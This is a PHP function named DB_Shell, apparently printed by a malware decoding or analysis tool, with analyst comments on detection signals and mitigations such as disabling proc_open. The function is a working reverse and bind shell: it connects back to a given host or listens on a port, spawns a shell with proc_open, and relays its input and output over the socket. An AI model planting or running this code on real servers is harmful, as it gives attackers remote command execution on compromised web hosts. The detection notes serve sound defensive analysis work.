# Returns an error string on setup failure; otherwise nothing.
# Analyst notes:
#  - the request that triggers this stays open for the life of the session
#    (set_time_limit(9000)), so look for very long-running PHP requests;
#  - both select calls use a zero timeout inside a loop with no sleep, so the
#    worker process polls continuously while the session is active;
#  - the web server process will own both a non-HTTP TCP connection and a
#    child process - a strong process/network correlation for EDR rules;
#  - disabling proc_open via disable_functions, or not loading the sockets
#    extension, removes the primitives this function needs.
function DB_Shell($type, $shell, $port, $host = "0.0.0.0") {
	if($type == "cb" && $host != "0.0.0.0") {
		$procsock = DB_NET_CONNECT($host, $port, "tcp");
	} elseif ($type == "pb") {
		$lsock = DB_NET_LISTEN($host, $port);
		if (($procsock = socket_accept($lsock)) < 0) {
    		return "socket_accept() failed: reason: " . socket_strerror($procsock) . "\n";
    	}
	} else {
		return "Error no connection details specified!";
	}

	set_time_limit(9000);
	# Child process pipes: 0 = stdin (we write), 1 = stdout, 2 = stderr (we read).
	$descriptorspec = array(
		0 => array("pipe", "r"),
		1 => array("pipe", "w"),
		2 => array("pipe", "w")
	);
	$process = proc_open($shell, $descriptorspec, $pipes);
	if (is_resource($process)) {
		$tmp_loop = 1;
		do {
			# Socket -> process: forward anything readable on the socket to stdin.
			$tmp_array = array($procsock);
			$num_changed_sockets = socket_select($tmp_array, $write = NULL, $except = NULL, 0);
			if ($num_changed_sockets === false) {
				$tmp_loop = 0;
			} else if ($num_changed_sockets > 0) {
				foreach($tmp_array as $k => $v) {
					if($v == $procsock) {
						if(socket_last_error($procsock) > 0) $tmp_loop = 0;
						if($tmp_loop == 1 && false == ($buf = socket_read($procsock, 2048, PHP_NORMAL_READ))) $tmp_loop = 0;
						fwrite($pipes[0], $buf);
					}
				}
			}
			# Process -> socket: forward stdout/stderr output back to the peer.
			$tmp_arrayS = array($pipes[1], $pipes[2]);
			$num_changed_streams = stream_select($tmp_arrayS, $write = NULL, $except = NULL, 0);
			if ($num_changed_streams === FALSE) {
				$tmp_loop = 0;
			} else if ($num_changed_streams > 0) {
				foreach($tmp_arrayS as $k => $v) {
					if($tmp_loop == 1 && false == ($buf = fread($v, 2048))) $tmp_loop = 0;
					socket_write($procsock, $buf, strlen($buf));
				}
			}
		} while($tmp_loop == 1);
	} else {
		return "Error executing shell " . $shell;
	}
}

?>

Function Calls

None

Variables

None

Stats

MD5 f44afbc866512877b80f46580dc16cfb
Eval Count 0
Decode Time 174 ms